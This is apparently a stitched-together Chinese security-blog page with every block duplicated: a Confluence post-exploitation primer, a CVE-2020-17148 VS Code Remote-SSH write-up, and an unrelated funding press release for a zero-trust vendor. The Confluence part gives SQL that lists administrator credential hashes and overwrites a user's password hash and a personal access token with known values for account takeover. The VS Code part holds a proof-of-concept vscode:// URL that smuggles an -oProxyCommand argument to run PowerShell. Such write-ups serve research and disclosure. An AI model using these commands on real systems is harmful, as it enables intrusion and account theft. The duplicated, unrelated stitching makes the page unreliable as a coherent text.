0x00 前言

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。

前不久爆出了漏洞CVE-2021-26084 - Confluence Server Webwork OGNL injection,本文仅在技术研究的角度介绍Confluence的相关知识。

0x01 简介

◼Confluence环境搭建

◼利用思路

0x02 Confluence环境搭建

环境搭建的参考资料:

Windows:

https://confluence.atlassian.com/doc/installing-confluence-on-windows-255362047.html

Linux:

https://confluence.atlassian.com/doc/installing-confluence-on-linux-143556824.html

本文以Centos7搭建Confluence为例进行介绍。

1.配置数据库

这里选择PostgreSQL,安装的参考资料:

https://confluence.atlassian.com/doc/database-setup-for-postgresql-173244522.html

(1)安装PostgreSQL

访问地址:https://www.postgresql.org/download/linux/redhat/

获得安装命令,如下图:

2.png

安装完成后查看运行状态:

systemctl status postgresql-13

(2)配置PostgreSQL

设置允许其他程序访问数据库:

修改/var/lib/pgsql/13/data/pg_hba.conf

将METHOD改为trust,设置如下图

3.png

重启PostgreSQL:

systemctl restart postgresql-13

补充:配置允许其他IP访问数据库

修改/var/lib/pgsql/13/data/pg_hba.conf

将ADDRESS改为0.0.0.0/0,如下图:

4.png

修改/var/lib/pgsql/13/data/postgresql.conf

设置listen_addresses = '*',如下图:

5.png

重启PostgreSQL:

systemctl restart postgresql-13

(3)数据库操作

PostgreSQL安装完成后会在本地操作系统创建一个名为postgres的用户,默认没有口令

切换到用户postgres:

su postgres

进入postgreSQL:

bash-4.2$ psql

设置用户postgres的口令:

postgres=# \password postgres

查看创建用户的命令说明:

postgres-# \h create user

如下图

6.png

创建用户confluence:

postgres-# create user confluenceuser with password 'confluenceuser' createdb login;

参数说明:

◼createdb:具有创建数据库的权限

◼login:具有登录权限

创建数据库confluence:

postgres-# create database confluence with owner=confluenceuser encoding='UTF8';

参数说明:

◼encoding:指定encoding必须为utf8

测试用户登录:

[[email protected] ~]$ psql -h localhost -p 5432 -d confluence -U confluenceuser

2.安装Confluence

下载地址:https://www.atlassian.com/software/confluence/download-archives

选择一个版本7.11.3

下载时选择7.11.3 - Linux Installer (64 bit),如下图

7.png

执行安装命令:

[[email protected] ~]$ ./atlassian-confluence-7.11.3-x64.bin

在安装过程中,选择Express Install (uses default settings) [1],如下图

8.png

安装结束后,使用浏览器访问http://localhost:8090

在设置Confluence页面,需要填入license,可以通过访问https://my.atlassian.com/license/evaluation获得,如下图

9.png

进入数据库设置页面,配置如下图

10.png

接下来,依次设置content、manage users和administrator account页面

最后的成功页面如下图

11.png

访问登录页面:http://localhost:8090/welcome.action,如下图

12.png

3.创建Confluence普通用户

使用管理员帐户登录后,选择Use management进行用户配置,如下图

13.png

添加用户test1,配置如下图

14.png

注:管理员帐户对应以下两个组:

◼confluence-administrators

◼confluence-users

添加用户后,可访问http://localhost:8090/进行登录

0x03 基础知识

1.文件目录

参考资料:

https://www.cwiki.us/display/CONF6ZH/Confluence+Home+and+other+important+directories

(1)< confluence-installation>

安装目录,用于存储系统文件

默认安装位置:

◼Windows: C:/Program Files/Atlassian/Confluence/

◼Linux: /opt/atlassian/confluence/

(2)< confluence-home>

数据目录,用于存储数据

默认安装位置:

◼Windows: C:/Program Files/Atlassian/Application Data/Confluence/

◼Linux: /var/atlassian/application-data/confluence/

二者之间的联系:

< confluence-installation>/confluence/WEB-INF/classes/confluence-init.properties文件中定义了< confluence-home>的位置

2.数据库信息

存储数据库配置信息的位置: < confluence-home>/confluence.cfg.xml

3.用户信息

用户信息位于Confluence的数据库中

存储用户信息的表:CWD_USER,具体列名称如下:

◼user_name:用户名

◼active:是否启用

◼email_address:邮件地址

◼credential:用户凭据

◼directory_id:用户组,代表用户的权限

directory_id对应的具体用户组名称可通过以下方式查看:

◼查询表cwd_group中的group_name列,管理员用户组的值为confluence-administrators

◼查询表cwd_directory中的directory_name列,管理员用户组的值为Confluence Internal Directory

直接筛选出管理员用户的SQL命令:

confluence=> select u.id,u.user_name,u.active,u.credential from cwd_user u  join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';

执行结果如下图

15.png

4.日志文件位置

< confluence-home>/logs/

5.Web路径

< confluence-installation>/confluence/

Windows: Confluence默认权限为network service,具有写权限

Linux: Confluence默认权限为confluence,没有写权限

0x04 利用思路

1.修改数据库,实现用户登录

(1)修改用户登录口令

利用实例:

查看用户关键信息,命令如下:

confluence=> select id,user_name,credential from cwd_user;

执行结果如下图

16.png

修改用户test2的口令信息,命令如下:

confluence=> UPDATE cwd_user SET credential= '{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm' WHERE id = 458755;

确认数据库被修改,如下图

17.png

注:

{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm对应的明文为123456

(2)修改Personal Access Tokens

使用Personal Access Tokens可以实现免密登录

介绍资料:

https://confluence.atlassian.com/bitbucketserver0610/personal-access-tokens-989761177.html

https://developer.atlassian.com/server/confluence/confluence-server-rest-api/

https://docs.atlassian.com/ConfluenceServer/rest/7.11.6/

利用实例:

测试环境下,Personal Access Tokens对应表为AO_81F455_PERSONAL_TOKEN

查询语句:

confluence=> select * from "AO_81F455_PERSONAL_TOKEN";

修改Personal Access Tokens,命令如下:

confluence=> UPDATE "AO_81F455_PERSONAL_TOKEN" SET "HASHED_TOKEN"= '{PKCS5S2}Deoq/psifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7/' WHERE "ID" = 4;

注:

{PKCS5S2}Deoq/psifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7/对应的token为MjE0NTg4NjQ3MTk2OrQ5JtSJgT/rrRBmCY4zu+N+NaWZ

2.写文件

Web路径:< confluence-installation>/confluence/

Windows: Confluence默认权限为network service,具有写权限

Linux: Confluence默认权限为confluence,没有写权限,但可以尝试内存马

0x05 小结

本文介绍了Confluence在利用上的相关基础知识。

0x00 前言

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。

前不久爆出了漏洞CVE-2021-26084 - Confluence Server Webwork OGNL injection,本文仅在技术研究的角度介绍Confluence的相关知识。

0x01 简介

◼Confluence环境搭建

◼利用思路

0x02 Confluence环境搭建

环境搭建的参考资料:

Windows:

https://confluence.atlassian.com/doc/installing-confluence-on-windows-255362047.html

Linux:

https://confluence.atlassian.com/doc/installing-confluence-on-linux-143556824.html

本文以Centos7搭建Confluence为例进行介绍。

1.配置数据库

这里选择PostgreSQL,安装的参考资料:

https://confluence.atlassian.com/doc/database-setup-for-postgresql-173244522.html

(1)安装PostgreSQL

访问地址:https://www.postgresql.org/download/linux/redhat/

获得安装命令,如下图:

2.png

安装完成后查看运行状态:

systemctl status postgresql-13

(2)配置PostgreSQL

设置允许其他程序访问数据库:

修改/var/lib/pgsql/13/data/pg_hba.conf

将METHOD改为trust,设置如下图

3.png

重启PostgreSQL:

systemctl restart postgresql-13

补充:配置允许其他IP访问数据库

修改/var/lib/pgsql/13/data/pg_hba.conf

将ADDRESS改为0.0.0.0/0,如下图:

4.png

修改/var/lib/pgsql/13/data/postgresql.conf

设置listen_addresses = '*',如下图:

5.png

重启PostgreSQL:

systemctl restart postgresql-13

(3)数据库操作

PostgreSQL安装完成后会在本地操作系统创建一个名为postgres的用户,默认没有口令

切换到用户postgres:

su postgres

进入postgreSQL:

bash-4.2$ psql

设置用户postgres的口令:

postgres=# \password postgres

查看创建用户的命令说明:

postgres-# \h create user

如下图

6.png

创建用户confluence:

postgres-# create user confluenceuser with password 'confluenceuser' createdb login;

参数说明:

◼createdb:具有创建数据库的权限

◼login:具有登录权限

创建数据库confluence:

postgres-# create database confluence with owner=confluenceuser encoding='UTF8';

参数说明:

◼encoding:指定encoding必须为utf8

测试用户登录:

[[email protected] ~]$ psql -h localhost -p 5432 -d confluence -U confluenceuser

2.安装Confluence

下载地址:https://www.atlassian.com/software/confluence/download-archives

选择一个版本7.11.3

下载时选择7.11.3 - Linux Installer (64 bit),如下图

7.png

执行安装命令:

[[email protected] ~]$ ./atlassian-confluence-7.11.3-x64.bin

在安装过程中,选择Express Install (uses default settings) [1],如下图

8.png

安装结束后,使用浏览器访问http://localhost:8090

在设置Confluence页面,需要填入license,可以通过访问https://my.atlassian.com/license/evaluation获得,如下图

9.png

进入数据库设置页面,配置如下图

10.png

接下来,依次设置content、manage users和administrator account页面

最后的成功页面如下图

11.png

访问登录页面:http://localhost:8090/welcome.action,如下图

12.png

3.创建Confluence普通用户

使用管理员帐户登录后,选择Use management进行用户配置,如下图

13.png

添加用户test1,配置如下图

14.png

注:管理员帐户对应以下两个组:

◼confluence-administrators

◼confluence-users

添加用户后,可访问http://localhost:8090/进行登录

0x03 基础知识

1.文件目录

参考资料:

https://www.cwiki.us/display/CONF6ZH/Confluence+Home+and+other+important+directories

(1)< confluence-installation>

安装目录,用于存储系统文件

默认安装位置:

◼Windows: C:/Program Files/Atlassian/Confluence/

◼Linux: /opt/atlassian/confluence/

(2)< confluence-home>

数据目录,用于存储数据

默认安装位置:

◼Windows: C:/Program Files/Atlassian/Application Data/Confluence/

◼Linux: /var/atlassian/application-data/confluence/

二者之间的联系:

< confluence-installation>/confluence/WEB-INF/classes/confluence-init.properties文件中定义了< confluence-home>的位置

2.数据库信息

存储数据库配置信息的位置: < confluence-home>/confluence.cfg.xml

3.用户信息

用户信息位于Confluence的数据库中

存储用户信息的表:CWD_USER,具体列名称如下:

◼user_name:用户名

◼active:是否启用

◼email_address:邮件地址

◼credential:用户凭据

◼directory_id:用户组,代表用户的权限

directory_id对应的具体用户组名称可通过以下方式查看:

◼查询表cwd_group中的group_name列,管理员用户组的值为confluence-administrators

◼查询表cwd_directory中的directory_name列,管理员用户组的值为Confluence Internal Directory

直接筛选出管理员用户的SQL命令:

confluence=> select u.id,u.user_name,u.active,u.credential from cwd_user u  join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';

执行结果如下图

15.png

4.日志文件位置

< confluence-home>/logs/

5.Web路径

< confluence-installation>/confluence/

Windows: Confluence默认权限为network service,具有写权限

Linux: Confluence默认权限为confluence,没有写权限

0x04 利用思路

1.修改数据库,实现用户登录

(1)修改用户登录口令

利用实例:

查看用户关键信息,命令如下:

confluence=> select id,user_name,credential from cwd_user;

执行结果如下图

16.png

修改用户test2的口令信息,命令如下:

confluence=> UPDATE cwd_user SET credential= '{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm' WHERE id = 458755;

确认数据库被修改,如下图

17.png

注:

{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm对应的明文为123456

(2)修改Personal Access Tokens

使用Personal Access Tokens可以实现免密登录

介绍资料:

https://confluence.atlassian.com/bitbucketserver0610/personal-access-tokens-989761177.html

https://developer.atlassian.com/server/confluence/confluence-server-rest-api/

https://docs.atlassian.com/ConfluenceServer/rest/7.11.6/

利用实例:

测试环境下,Personal Access Tokens对应表为AO_81F455_PERSONAL_TOKEN

查询语句:

confluence=> select * from "AO_81F455_PERSONAL_TOKEN";

修改Personal Access Tokens,命令如下:

confluence=> UPDATE "AO_81F455_PERSONAL_TOKEN" SET "HASHED_TOKEN"= '{PKCS5S2}Deoq/psifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7/' WHERE "ID" = 4;

注:

{PKCS5S2}Deoq/psifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7/对应的token为MjE0NTg4NjQ3MTk2OrQ5JtSJgT/rrRBmCY4zu+N+NaWZ

2.写文件

Web路径:< confluence-installation>/confluence/

Windows: Confluence默认权限为network service,具有写权限

Linux: Confluence默认权限为confluence,没有写权限,但可以尝试内存马

0x05 小结

本文介绍了Confluence在利用上的相关基础知识。

Visual Studio Code Remote Development扩展程序远程执行代码漏洞。

Visual Studio Code Remote Development Extension(VS 代码远程开发扩展)允许用户使用容器、远程机器或Windows Linux子系统作为完整的开发环境。利用该扩展可以:

◼分隔开发环境来避免影响本地机器配置;

◼使用本地操作系统中没有的工具或运行时环境和管理多个版本;

◼使用Windows Linux子系统来开发Linux部署的应用;

◼远程开发扩展包中的每个扩展都可以直接在容器或WSL中运行命令和其他扩展,就像在本地运行一样。

CVE-2020-17148漏洞分析

研究人员在Visual Studio代码远程开发扩展中发现了一个远程代码执行漏洞——CVE-2020-17148,攻击者利用该漏洞可以迫使受害者访问恶意链接,访问恶意链接会导致其可以在系统中执行任意代码。

漏洞产生的原因是“Remote - SSH”扩展的一个参数注入。Remote-SSH扩展是远程开发扩展安全和使用的,会使用主机的SSH二进制文件来与远程主机建立连接。

其中一种触发SSH连接的方式是使用vscode:// URI方案,具体格式为:

vscode://vscode-remote/ssh-remote+$REMOTE_HOST+$PATH_OF_PROJECT_ON_THE_REMOTE_HOST

用户浏览该URI后,VSCode就会打开,扩展就会尝试连接到远程主机$REMOTE_HOST。

并执行命令:ssh -T -D $RANDOM_PORT "$REMOTE_HOST" bash

由于$REMOTE_HOST没有对用户提供的输入进行处理,可能会对SSH二进制文件注入任意参数。

SSH中有一个ProxyCommand的可选性,用来指定执行真实的SSH连接前要执行的命令。

结合以上,就可以使受害者打开一个恶意链接时在受害者主机上执行任意系统命令。

PoC

PoC示例过程如下:

1、安装 Visual Studio Code;

2、安装“Remote Development”扩展(https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.vscode-remote-extensionpack);

3、打开浏览器,访问URL: vscode://vscode-remote/ssh-remote+-oProxyCommand=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c msg %username% command_injection" "[email protected]+/a

4、确认打开 VSCode

5、选择随机的操作系统(Linux / Windows / MacOS)

6、注意powershell执行的含有“command_injection”消息的弹窗。

 Visual Studio Code Remote Development

通过编辑ProxyCommand也可以在Linux和macOS系统上复现同样的攻击。

补丁

目前,Visual Studio Code Remote Development Extension已经发布补丁,研究人员建议用户尽快更新到v1.51及更高版本。

Visual Studio Code Remote Development扩展程序远程执行代码漏洞。

Visual Studio Code Remote Development Extension(VS 代码远程开发扩展)允许用户使用容器、远程机器或Windows Linux子系统作为完整的开发环境。利用该扩展可以:

◼分隔开发环境来避免影响本地机器配置;

◼使用本地操作系统中没有的工具或运行时环境和管理多个版本;

◼使用Windows Linux子系统来开发Linux部署的应用;

◼远程开发扩展包中的每个扩展都可以直接在容器或WSL中运行命令和其他扩展,就像在本地运行一样。

CVE-2020-17148漏洞分析

研究人员在Visual Studio代码远程开发扩展中发现了一个远程代码执行漏洞——CVE-2020-17148,攻击者利用该漏洞可以迫使受害者访问恶意链接,访问恶意链接会导致其可以在系统中执行任意代码。

漏洞产生的原因是“Remote - SSH”扩展的一个参数注入。Remote-SSH扩展是远程开发扩展安全和使用的,会使用主机的SSH二进制文件来与远程主机建立连接。

其中一种触发SSH连接的方式是使用vscode:// URI方案,具体格式为:

vscode://vscode-remote/ssh-remote+$REMOTE_HOST+$PATH_OF_PROJECT_ON_THE_REMOTE_HOST

用户浏览该URI后,VSCode就会打开,扩展就会尝试连接到远程主机$REMOTE_HOST。

并执行命令:ssh -T -D $RANDOM_PORT "$REMOTE_HOST" bash

由于$REMOTE_HOST没有对用户提供的输入进行处理,可能会对SSH二进制文件注入任意参数。

SSH中有一个ProxyCommand的可选性,用来指定执行真实的SSH连接前要执行的命令。

结合以上,就可以使受害者打开一个恶意链接时在受害者主机上执行任意系统命令。

PoC

PoC示例过程如下:

1、安装 Visual Studio Code;

2、安装“Remote Development”扩展(https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.vscode-remote-extensionpack);

3、打开浏览器,访问URL: vscode://vscode-remote/ssh-remote+-oProxyCommand=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c msg %username% command_injection" "[email protected]+/a

4、确认打开 VSCode

5、选择随机的操作系统(Linux / Windows / MacOS)

6、注意powershell执行的含有“command_injection”消息的弹窗。

 Visual Studio Code Remote Development

通过编辑ProxyCommand也可以在Linux和macOS系统上复现同样的攻击。

补丁

目前,Visual Studio Code Remote Development Extension已经发布补丁,研究人员建议用户尽快更新到v1.51及更高版本。

9月30日,中国零信任安全领域领导者和创新企业数篷科技宣布完成5000万美元B+轮融资。本轮融资由老虎环球基金领投,老股东经纬创投、时代资本(Jeneration Capital)、高瓴创投、金沙江创投继续加码跟投,指数资本担任独家财务顾问。

图片1.jpg

2021年1月,数篷科技获得高瓴创投领投、金沙江创投及老股东经纬创投、时代资本跟投的2800万美元B轮融资。得益于公司在零信任领域领先的产品技术优势和快速的商业化验证进展,数篷科技仅时隔9个月再获顶级资本青睐。截至2021年8月底,数篷科技在客户留存率、签约客户数、合同金额等核心指标上同比均实现超预期增长。自2018年6月公司成立以来,数篷科技已经完成四轮融资,融资总金额接近1亿美元。

近年来,各行各业的数据安全事件频频见诸报端,企业数据安全问题焦灼激化,受到广泛的关注。究其原因,除了国内企业在信息化和安全方面的投入不足,更重要的是企业传统IT/OT安全架构已不能适应数字化转型和云计算的发展的需要。同时,数据安全相关的法律法规、监管政策也正加速落地,倒逼企业必须改进和变革。零信任作为一种理念和浪潮,催生了很多新的安全产品、模型和框架,包括数篷科技2020年发布的HyperCloak®零信任安全框架,可以帮助企业在落地精细化访问安全的同时,进一步实现数据广泛分布环境下的数据安全、弹性连接和高效业务连续性。

数篷科技秉持“安全即基础设施”的理念,帮助客户实现端到端的零信任安全基础架构升级,解决从替代传统VPN、业务系统隐身和减少攻击暴露面,到终端设备和云计算节点的环境可信与数据安全,以及跨云高速安全连接等方面的问题。基于产品标准化程度高、部署成本低、用户体验好和平台级的产品属性等优势,数篷科技成为金融、高端制造、互联网、专业服务等众多行业客户零信任安全架构升级的首选合作伙伴。

“零信任理念是基于威胁无处无时不在的假设,和期望达到让合适的人得到合理授权的目标。这个理念越来越被认知和接受,也将是企业安全开发和系统设计需要遵循的一般原则,”数篷科技联合创始人兼CEO刘超表示,“我们相信零信任将是未来安全发展的重要趋势。本轮融资后,我们将继续加大研发投入和产品创新,推进市场拓展和客户服务能力,更好地服务客户、满足不断增长的客户需求,进一步巩固领先的行业地位。”

老虎环球基金全球合伙人王鹏飞表示:“安全市场是老虎环球基金非常重视的投资领域。数篷科技的产品不仅技术领先、壁垒高,还拥有很高的客户满意度,业务增长迅速。我们非常高兴能与数篷合作,也非常看好在CEO刘超带领下的数篷,定能成为零信任安全领域的领跑者。”

经纬创投合伙人熊飞说:“数篷是新一代的安全产品和零信任安全领域的新兴领军企业。有贝壳、京东、浪潮、太平洋保险、中信建投等一流标杆客户深度使用,用户口碑一流。非常看好公司的发展前景。期待公司业务和产品继续快速进阶,成为国内甚至全球安全领域的一流玩家。”

时代资本合伙人张自权认为:“随着各行业数字化转型升级加速,海量数据高频流动成为新常态,数据安全在企业业务和IT决策中的战略地位也迅速提升。回顾近半年,数据安全相关政策持续落地,数篷团队紧跟行业趋势,不断完善产品矩阵,持续深耕金融、高科技、互联网等重点行业,提升头部客户服务能力,其创新的零信任架构解决方案也逐步成为客户的关键基础设施。我们期待团队通过不断的技术创新,持续为客户创造价值。”

高瓴创投合伙人李强提到:“数据安全对现代企业发展至关重要,而零信任模型提供了更强有力的保护:通过微分段、软件定义边界(SDP)、身份管理与访问控制,可以轻松地控制潜在威胁,保护敏感系统和数据。数篷科技则是零信任安全领域的佼佼者。在创始人刘超带领下,数篷不但提供了一套零信任安全框架,还以高度理解用户需求、可灵活部署的解决方案赢得了客户的强烈认可。我们看好数篷的长期发展,相信数篷将为中国企业的安全保驾护航。”

金沙江创投主管合伙人张予彤表示:“数篷科技的产品不仅实现了零信任网络访问控制能力,还结合全局身份管理、AI安全引擎和轻量可信计算技术,为企业客户提供了各种工作场景下的安全办公空间,顺应了企业远程办公、业务外包和数字化转型的趋势,解决了中国企业客户对于数据泄密防护的痛点。数篷科技在不断快速扩展市场的同时,老客户的续约和增购也成绩亮眼,充分体现了客户对其产品的认可。我们相信数篷科技会成为一家世界级的安全厂商。”

数篷科技成立于2018年,是领先的安全技术创新公司。基于轻量可信计算和零信任理念,数篷科技为企业提供下一代软件定义的网络安全基础架构解决方案。2019年数篷科技发布的DACS零信任安全工作空间,不仅为企业提供了一般零信任解决方案提供的基础功能,如网络接入、网络隐身、访问控制等,还帮助企业解决了终端数据保护问题。2020年9月数篷科技发布了HyperCloak®零信任安全框架,与众多行业合作伙伴共同为企业提供整体解决方案。该框架已在京东、贝壳等企业场景落地应用。2021年8月数篷科技联合万国数据推出SASE解决方案,帮助企业实现混合云场景下的高速连接和安全访问能力。

9月30日,中国零信任安全领域领导者和创新企业数篷科技宣布完成5000万美元B+轮融资。本轮融资由老虎环球基金领投,老股东经纬创投、时代资本(Jeneration Capital)、高瓴创投、金沙江创投继续加码跟投,指数资本担任独家财务顾问。

图片1.jpg

2021年1月,数篷科技获得高瓴创投领投、金沙江创投及老股东经纬创投、时代资本跟投的2800万美元B轮融资。得益于公司在零信任领域领先的产品技术优势和快速的商业化验证进展,数篷科技仅时隔9个月再获顶级资本青睐。截至2021年8月底,数篷科技在客户留存率、签约客户数、合同金额等核心指标上同比均实现超预期增长。自2018年6月公司成立以来,数篷科技已经完成四轮融资,融资总金额接近1亿美元。

近年来,各行各业的数据安全事件频频见诸报端,企业数据安全问题焦灼激化,受到广泛的关注。究其原因,除了国内企业在信息化和安全方面的投入不足,更重要的是企业传统IT/OT安全架构已不能适应数字化转型和云计算的发展的需要。同时,数据安全相关的法律法规、监管政策也正加速落地,倒逼企业必须改进和变革。零信任作为一种理念和浪潮,催生了很多新的安全产品、模型和框架,包括数篷科技2020年发布的HyperCloak®零信任安全框架,可以帮助企业在落地精细化访问安全的同时,进一步实现数据广泛分布环境下的数据安全、弹性连接和高效业务连续性。

数篷科技秉持“安全即基础设施”的理念,帮助客户实现端到端的零信任安全基础架构升级,解决从替代传统VPN、业务系统隐身和减少攻击暴露面,到终端设备和云计算节点的环境可信与数据安全,以及跨云高速安全连接等方面的问题。基于产品标准化程度高、部署成本低、用户体验好和平台级的产品属性等优势,数篷科技成为金融、高端制造、互联网、专业服务等众多行业客户零信任安全架构升级的首选合作伙伴。

“零信任理念是基于威胁无处无时不在的假设,和期望达到让合适的人得到合理授权的目标。这个理念越来越被认知和接受,也将是企业安全开发和系统设计需要遵循的一般原则,”数篷科技联合创始人兼CEO刘超表示,“我们相信零信任将是未来安全发展的重要趋势。本轮融资后,我们将继续加大研发投入和产品创新,推进市场拓展和客户服务能力,更好地服务客户、满足不断增长的客户需求,进一步巩固领先的行业地位。”

老虎环球基金全球合伙人王鹏飞表示:“安全市场是老虎环球基金非常重视的投资领域。数篷科技的产品不仅技术领先、壁垒高,还拥有很高的客户满意度,业务增长迅速。我们非常高兴能与数篷合作,也非常看好在CEO刘超带领下的数篷,定能成为零信任安全领域的领跑者。”

经纬创投合伙人熊飞说:“数篷是新一代的安全产品和零信任安全领域的新兴领军企业。有贝壳、京东、浪潮、太平洋保险、中信建投等一流标杆客户深度使用,用户口碑一流。非常看好公司的发展前景。期待公司业务和产品继续快速进阶,成为国内甚至全球安全领域的一流玩家。”

时代资本合伙人张自权认为:“随着各行业数字化转型升级加速,海量数据高频流动成为新常态,数据安全在企业业务和IT决策中的战略地位也迅速提升。回顾近半年,数据安全相关政策持续落地,数篷团队紧跟行业趋势,不断完善产品矩阵,持续深耕金融、高科技、互联网等重点行业,提升头部客户服务能力,其创新的零信任架构解决方案也逐步成为客户的关键基础设施。我们期待团队通过不断的技术创新,持续为客户创造价值。”

高瓴创投合伙人李强提到:“数据安全对现代企业发展至关重要,而零信任模型提供了更强有力的保护:通过微分段、软件定义边界(SDP)、身份管理与访问控制,可以轻松地控制潜在威胁,保护敏感系统和数据。数篷科技则是零信任安全领域的佼佼者。在创始人刘超带领下,数篷不但提供了一套零信任安全框架,还以高度理解用户需求、可灵活部署的解决方案赢得了客户的强烈认可。我们看好数篷的长期发展,相信数篷将为中国企业的安全保驾护航。”

金沙江创投主管合伙人张予彤表示:“数篷科技的产品不仅实现了零信任网络访问控制能力,还结合全局身份管理、AI安全引擎和轻量可信计算技术,为企业客户提供了各种工作场景下的安全办公空间,顺应了企业远程办公、业务外包和数字化转型的趋势,解决了中国企业客户对于数据泄密防护的痛点。数篷科技在不断快速扩展市场的同时,老客户的续约和增购也成绩亮眼,充分体现了客户对其产品的认可。我们相信数篷科技会成为一家世界级的安全厂商。”

数篷科技成立于2018年,是领先的安全技术创新公司。基于轻量可信计算和零信任理念,数篷科技为企业提供下一代软件定义的网络安全基础架构解决方案。2019年数篷科技发布的DACS零信任安全工作空间,不仅为企业提供了一般零信任解决方案提供的基础功能,如网络接入、网络隐身、访问控制等,还帮助企业解决了终端数据保护问题。2020年9月数篷科技发布了HyperCloak®零信任安全框架,与众多行业合作伙伴共同为企业提供整体解决方案。该框架已在京东、贝壳等企业场景落地应用。2021年8月数篷科技联合万国数据推出SASE解决方案,帮助企业实现混合云场景下的高速连接和安全访问能力。